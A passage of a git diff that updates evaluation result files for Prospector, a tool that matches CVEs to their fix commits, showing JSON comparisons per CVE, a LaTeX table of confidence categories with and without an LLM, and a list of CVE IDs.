"different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-7660": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2011-2732": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-3808": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8359": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10766": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2010-2076": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-2068": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-3728": { + "different first commit": true, + "different references": true + } + }, + { + "CVE-2018-13790": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-7675": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-17359": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-11087": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10582": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-0293": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10557": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10158": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-1098": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-5954": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-5250": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-12203": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2015-5207": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-2115": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-12748": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6519": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2019-3810": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-14280": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2013-0285": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2014-0116": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8473": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-5241": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2020-1938": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-10071": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-0097": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2013-1654": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10542": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-8745": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-1829": { + "different first commit": true, + "different references": true + } + }, + { + "CVE-2019-17223": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-3451": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-12159": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-7666": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1193": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8008": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-0208": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-4952": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-0224": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-3743": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-1987": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-1000042": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-1001": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-12423": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-11503": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-7957": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2015-3192": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-7537": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2010-4535": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1339": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10174": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-12158": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-0086": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-10912": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-19787": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-2254": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-10579": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-9265": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2010-0156": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6817": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-5018": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2013-4761": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8541": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2013-7315": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2016-6797": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10550": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-9096": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-3081": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-3867": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-1906": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-10862": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-0035": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-2649": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8315": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-14683": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2019-11269": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2014-0228": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6794": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-7661": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-15608": { + "different first commit": false, + "different references": true + } + }, + { + "CVE-2017-12160": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-4449": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-0226": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-3799": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-11289": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1314": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-8861": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2012-5055": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-11328": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-12245": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-3847": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-7662": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-0289": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-3850": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-10750": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-15758": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-11016": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2020-7596": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-5211": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-6796": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-2379": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-12631": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-12617": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2017-2592": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-14838": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-11777": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2012-0392": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8510": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-15720": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-3774": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2010-4534": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2011-3848": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10763": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-7644": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2016-5388": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2020-1937": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2015-1830": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2017-17835": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2019-12419": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2019-10754": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2010-5142": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-3758": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1000854": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2020-8134": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-8465": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + }, + { + "CVE-2018-1259": { + "different first commit": false, + "different references": false, + "different keywords": false, + "same commits, ordered differently": false, + "same relevance sum": false + } + }, + { + "CVE-2011-1772": { + "different first commit": true, + "different references": false, + "different keywords": false, + "same commits, ordered differently": true + } + } + ] + } + ], + "category_adjustments": { + "medium": -75, + "high": 80, + "low": -5, + "not_reported": -161, + "false_positive": 161 + } +} \ No newline at end of file diff --git a/prospector/evaluation/data/results/summary_execution_mvi_table.tex b/prospector/evaluation/data/results/summary_execution_mvi_table.tex index 35e8c3848..d92e53274 100644 --- a/prospector/evaluation/data/results/summary_execution_mvi_table.tex +++ b/prospector/evaluation/data/results/summary_execution_mvi_table.tex @@ -3,28 +3,28 @@ % \tiny \begin{tabular}{| l c c c c |} \rowcolor{gray!50} \textbf{Result} & \textbf{Without LLM} & \textbf{\%} & \textbf{With LLM} & \textbf{\%} \\ \hline - High confidence & 960 & 73.56 & 548 & 41.99 \\ + High confidence & 468 & 35.86 & 548 & 41.99 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Commit in reference* \\ - \end{tabular} & 847 & 88.23 & 413 & 75.36 \\ + \end{tabular} & 413 & 88.25 & 413 & 75.36 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad CVE ID in message* \\ - \end{tabular} & 162 & 16.88 & 69 & 12.59 \\ + \end{tabular} & 69 & 14.74 & 69 & 12.59 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad CVE ID in Issue* \\ - \end{tabular} & 37 & 3.85 & 12 & 2.19 \\ + \end{tabular} & 12 & 2.56 & 12 & 2.19 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Cross Reference* \\ - \end{tabular} & 339 & 35.31 & 135 & 24.64 \\ + \end{tabular} & 135 & 28.85 & 135 & 24.64 \\ \rowcolor{gray!20} \begin{tabular}{l} \quad Commit is Security Relevant* \\ - \end{tabular} & 0 & 0.0 & 488 & 37.39 \\ - Medium confidence & 179 & 13.72 & 18 & 1.38 \\ - Low confidence & 9 & 0.69 & 6 & 0.46 \\ - Not found (rank $> 10$) & 31 & 2.38 & 11 & 0.84 \\ - Not reported & 103 & 7.89 & 44 & 3.37 \\ - False Positive & 23 & 1.76 & 678 & 51.95 \\ - Aborted (due to exceeding candidate limit) & 14 & 1.07 & 14 & 1.07 \\ + \end{tabular} & 0 & 0.0 & 488 & 37.39 \\ + Medium confidence & 93 & 7.13 & 18 & 1.38 \\ + Low confidence & 11 & 0.84 & 6 & 0.46 \\ + Not found (rank $> 10$) & 11 & 0.84 & 11 & 0.84 \\ + Not reported & 205 & 15.71 & 44 & 3.37 \\ + False Positive & 517 & 39.62 & 678 & 51.95 \\ + Aborted (due to exceeding candidate limit) & 14 & 1.07 & 14 & 1.07 \\ \textbf{Total} & \textbf{1305} & & \textbf{1305} & \\ \hline \end{tabular} \caption{Prospector Evaluation Results (* percentage of high confidence category)} diff --git a/prospector/evaluation/data/results/summary_execution_mvi_without_llm.json b/prospector/evaluation/data/results/summary_execution_mvi_without_llm.json new file mode 100644 index 000000000..f392c7e19 --- /dev/null +++ b/prospector/evaluation/data/results/summary_execution_mvi_without_llm.json @@ -0,0 +1,1996 @@ +{ + "summary_execution_details": [ + { + "timestamp": "30-08-2024, 09:46", + "results": { + "high": [ + "CVE-2010-5312", + "CVE-2011-2765", + "CVE-2011-3186", + "CVE-2011-4030", + "CVE-2011-4461", + "CVE-2012-1109", + "CVE-2012-1176", + "CVE-2012-2417", + "CVE-2012-3366", + "CVE-2012-3408", + "CVE-2012-3458", + "CVE-2012-6550", + "CVE-2013-0256", + "CVE-2013-0294", + "CVE-2013-1800", + "CVE-2013-1801", + "CVE-2013-1879", + "CVE-2013-1880", + "CVE-2013-2013", + "CVE-2013-2035", + "CVE-2013-2191", + "CVE-2013-3300", + "CVE-2013-4116", + "CVE-2013-4413", + "CVE-2013-4562", + "CVE-2013-4701", + "CVE-2013-6465", + "CVE-2013-7378", + "CVE-2013-7459", + "CVE-2014-0072", + "CVE-2014-0073", + "CVE-2014-0120", + "CVE-2014-0121", + "CVE-2014-0160", + "CVE-2014-0177", + "CVE-2014-1202", + "CVE-2014-1403", + "CVE-2014-1604", + "CVE-2014-1904", + "CVE-2014-3120", + "CVE-2014-3488", + "CVE-2014-3579", + "CVE-2014-3599", + "CVE-2014-3612", + "CVE-2014-3741", + "CVE-2014-3995", + "CVE-2014-4657", + "CVE-2014-6394", + "CVE-2014-7192", + "CVE-2014-7193", + "CVE-2014-8115", + "CVE-2014-8152", + "CVE-2014-8681", + "CVE-2014-8682", + "CVE-2014-9130", + "CVE-2014-9489", + "CVE-2014-9682", + "CVE-2014-9721", + "CVE-2015-0276", + "CVE-2015-0838", + "CVE-2015-0846", + "CVE-2015-1326", + "CVE-2015-1782", + "CVE-2015-1838", + "CVE-2015-3206", + "CVE-2015-3220", + "CVE-2015-4082", + "CVE-2015-4410", + "CVE-2015-4412", + "CVE-2015-4619", + "CVE-2015-5081", + "CVE-2015-5147", + "CVE-2015-6584", + "CVE-2015-7294", + "CVE-2015-7337", + "CVE-2015-7541", + "CVE-2015-7809", + "CVE-2015-8309", + "CVE-2015-8310", + "CVE-2015-8747", + "CVE-2015-8814", + "CVE-2015-8854", + "CVE-2015-9235", + "CVE-2015-9241", + "CVE-2016-0750", + "CVE-2016-1505", + "CVE-2016-2166", + "CVE-2016-2537", + "CVE-2016-3114", + "CVE-2016-3693", + "CVE-2016-3720", + "CVE-2016-4442", + "CVE-2016-4562", + "CVE-2016-4563", + "CVE-2016-4564", + "CVE-2016-4974", + "CVE-2016-5007", + "CVE-2016-5104", + "CVE-2016-5180", + "CVE-2016-5431", + "CVE-2016-5697", + "CVE-2016-5841", + "CVE-2016-5842", + "CVE-2016-5851", + "CVE-2016-6298", + "CVE-2016-7528", + "CVE-2016-9298", + "CVE-2016-9909", + "CVE-2016-9910", + "CVE-2016-10149", + "CVE-2016-10173", + "CVE-2016-10345", + "CVE-2016-10522", + "CVE-2016-10524", + "CVE-2016-10531", + "CVE-2016-10536", + "CVE-2016-10540", + "CVE-2016-10544", + "CVE-2016-10554", + "CVE-2016-10556", + "CVE-2016-10577", + "CVE-2016-10703", + "CVE-2016-1000236", + "CVE-2016-1000338", + "CVE-2016-1000340", + "CVE-2016-1000343", + "CVE-2016-1000344", + "CVE-2017-0904", + "CVE-2017-2809", + "CVE-2017-3204", + "CVE-2017-5209", + "CVE-2017-5545", + "CVE-2017-5591", + "CVE-2017-5645", + "CVE-2017-5934", + "CVE-2017-5936", + "CVE-2017-5946", + "CVE-2017-7540", + "CVE-2017-7654", + "CVE-2017-7656", + "CVE-2017-8028", + "CVE-2017-8418", + "CVE-2017-8932", + "CVE-2017-11173", + "CVE-2017-11427", + "CVE-2017-11905", + "CVE-2017-11910", + "CVE-2017-12098", + "CVE-2017-12867", + "CVE-2017-12871", + "CVE-2017-13098", + "CVE-2017-14619", + "CVE-2017-14735", + "CVE-2017-15051", + "CVE-2017-15052", + "CVE-2017-15053", + "CVE-2017-15054", + "CVE-2017-15055", + "CVE-2017-15133", + "CVE-2017-15278", + "CVE-2017-15703", + "CVE-2017-15728", + "CVE-2017-15729", + "CVE-2017-15730", + "CVE-2017-15731", + "CVE-2017-15733", + "CVE-2017-15734", + "CVE-2017-15735", + "CVE-2017-15808", + "CVE-2017-15809", + "CVE-2017-15879", + "CVE-2017-15928", + "CVE-2017-16003", + "CVE-2017-16008", + "CVE-2017-16013", + "CVE-2017-16014", + "CVE-2017-16015", + "CVE-2017-16016", + "CVE-2017-16017", + "CVE-2017-16023", + "CVE-2017-16025", + "CVE-2017-16042", + "CVE-2017-16136", + "CVE-2017-16226", + "CVE-2017-16228", + "CVE-2017-16244", + "CVE-2017-16613", + "CVE-2017-16615", + "CVE-2017-16616", + "CVE-2017-16618", + "CVE-2017-16876", + "CVE-2017-16877", + "CVE-2017-16880", + "CVE-2017-17042", + "CVE-2017-18239", + "CVE-2017-18367", + "CVE-2017-1000188", + "CVE-2017-1000189", + "CVE-2017-1000228", + "CVE-2017-1000486", + "CVE-2017-1000487", + "CVE-2017-1000491", + "CVE-2017-1001002", + "CVE-2017-1001003", + "CVE-2017-1001004", + "CVE-2017-1002150", + "CVE-2018-1098", + "CVE-2018-1099", + "CVE-2018-1309", + "CVE-2018-1320", + "CVE-2018-3712", + "CVE-2018-3715", + "CVE-2018-3721", + "CVE-2018-3726", + "CVE-2018-3732", + "CVE-2018-3733", + "CVE-2018-3740", + "CVE-2018-3741", + "CVE-2018-3750", + "CVE-2018-3759", + "CVE-2018-3769", + "CVE-2018-3774", + "CVE-2018-3778", + "CVE-2018-3786", + "CVE-2018-5968", + "CVE-2018-6333", + "CVE-2018-7260", + "CVE-2018-7408", + "CVE-2018-7560", + "CVE-2018-7651", + "CVE-2018-7753", + "CVE-2018-8013", + "CVE-2018-8016", + "CVE-2018-8128", + "CVE-2018-8177", + "CVE-2018-8178", + "CVE-2018-8381", + "CVE-2018-8390", + "CVE-2018-9109", + "CVE-2018-9110", + "CVE-2018-9206", + "CVE-2018-10092", + "CVE-2018-10094", + "CVE-2018-10095", + "CVE-2018-10188", + "CVE-2018-10366", + "CVE-2018-10903", + "CVE-2018-10936", + "CVE-2018-11093", + "CVE-2018-11771", + "CVE-2018-11798", + "CVE-2018-12043", + "CVE-2018-12418", + "CVE-2018-12541", + "CVE-2018-12557", + "CVE-2018-12615", + "CVE-2018-12976", + "CVE-2018-13447", + "CVE-2018-13448", + "CVE-2018-13449", + "CVE-2018-13450", + "CVE-2018-13797", + "CVE-2018-13818", + "CVE-2018-14041", + "CVE-2018-14718", + "CVE-2018-14719", + "CVE-2018-14720", + "CVE-2018-14721", + "CVE-2018-14840", + "CVE-2018-15178", + "CVE-2018-15531", + "CVE-2018-16329", + "CVE-2018-16470", + "CVE-2018-16472", + "CVE-2018-16492", + "CVE-2018-17104", + "CVE-2018-17187", + "CVE-2018-17193", + "CVE-2018-17194", + "CVE-2018-17195", + "CVE-2018-17419", + "CVE-2018-18389", + "CVE-2018-18476", + "CVE-2018-19048", + "CVE-2018-19184", + "CVE-2018-19360", + "CVE-2018-19361", + "CVE-2018-19362", + "CVE-2018-19992", + "CVE-2018-19993", + "CVE-2018-19994", + "CVE-2018-20028", + "CVE-2018-20059", + "CVE-2018-20433", + "CVE-2018-20594", + "CVE-2018-20595", + "CVE-2018-20677", + "CVE-2018-20801", + "CVE-2018-20835", + "CVE-2018-20962", + "CVE-2018-1000089", + "CVE-2018-1000119", + "CVE-2018-1000129", + "CVE-2018-1000134", + "CVE-2018-1000164", + "CVE-2018-1000518", + "CVE-2018-1000525", + "CVE-2018-1000531", + "CVE-2018-1000538", + "CVE-2018-1000620", + "CVE-2018-1000632", + "CVE-2018-1000805", + "CVE-2018-1000807", + "CVE-2018-1000808", + "CVE-2018-1000814", + "CVE-2018-1000843", + "CVE-2018-1000850", + "CVE-2018-1000888", + "CVE-2018-1002201", + "CVE-2018-1002207", + "CVE-2018-1002208", + "CVE-2018-1999024", + "CVE-2019-0911", + "CVE-2019-0912", + "CVE-2019-0917", + "CVE-2019-0922", + "CVE-2019-0924", + "CVE-2019-0925", + "CVE-2019-0933", + "CVE-2019-1052", + "CVE-2019-1062", + "CVE-2019-1092", + "CVE-2019-1103", + "CVE-2019-1106", + "CVE-2019-1107", + "CVE-2019-1139", + "CVE-2019-1195", + "CVE-2019-1196", + "CVE-2019-1197", + "CVE-2019-3564", + "CVE-2019-3826", + "CVE-2019-5413", + "CVE-2019-5484", + "CVE-2019-5884", + "CVE-2019-6798", + "CVE-2019-7164", + "CVE-2019-7548", + "CVE-2019-7722", + "CVE-2019-8457", + "CVE-2019-9658", + "CVE-2019-10131", + "CVE-2019-10157", + "CVE-2019-10217", + "CVE-2019-10241", + "CVE-2019-10248", + "CVE-2019-10642", + "CVE-2019-10643", + "CVE-2019-10682", + "CVE-2019-10749", + "CVE-2019-10751", + "CVE-2019-10752", + "CVE-2019-10762", + "CVE-2019-10767", + "CVE-2019-10776", + "CVE-2019-10781", + "CVE-2019-10787", + "CVE-2019-10792", + "CVE-2019-10793", + "CVE-2019-10795", + "CVE-2019-10799", + "CVE-2019-10867", + "CVE-2019-11272", + "CVE-2019-11358", + "CVE-2019-11512", + "CVE-2019-11514", + "CVE-2019-11768", + "CVE-2019-11777", + "CVE-2019-12277", + "CVE-2019-12402", + "CVE-2019-12616", + "CVE-2019-12741", + "CVE-2019-12814", + "CVE-2019-13127", + "CVE-2019-13135", + "CVE-2019-13173", + "CVE-2019-13295", + "CVE-2019-13574", + "CVE-2019-13644", + "CVE-2019-14540", + "CVE-2019-14668", + "CVE-2019-14669", + "CVE-2019-14671", + "CVE-2019-14672", + "CVE-2019-14751", + "CVE-2019-14806", + "CVE-2019-14837", + "CVE-2019-14862", + "CVE-2019-14863", + "CVE-2019-14893", + "CVE-2019-14980", + "CVE-2019-15481", + "CVE-2019-15532", + "CVE-2019-15658", + "CVE-2019-16317", + "CVE-2019-16318", + "CVE-2019-16335", + "CVE-2019-16676", + "CVE-2019-16761", + "CVE-2019-16762", + "CVE-2019-16763", + "CVE-2019-16766", + "CVE-2019-16769", + "CVE-2019-16771", + "CVE-2019-16778", + "CVE-2019-16779", + "CVE-2019-16784", + "CVE-2019-16785", + "CVE-2019-16786", + "CVE-2019-16789", + "CVE-2019-16792", + "CVE-2019-17267", + "CVE-2019-17496", + "CVE-2019-17513", + "CVE-2019-17531", + "CVE-2019-17541", + "CVE-2019-17592", + "CVE-2019-18622", + "CVE-2019-18656", + "CVE-2019-18848", + "CVE-2019-18857", + "CVE-2019-18874", + "CVE-2019-18978", + "CVE-2019-18981", + "CVE-2019-18982", + "CVE-2019-18985", + "CVE-2019-18986", + "CVE-2019-19010", + "CVE-2019-19275", + "CVE-2019-19507", + "CVE-2019-19576", + "CVE-2019-19619", + "CVE-2019-19687", + "CVE-2019-19703", + "CVE-2019-19794", + "CVE-2019-20330", + 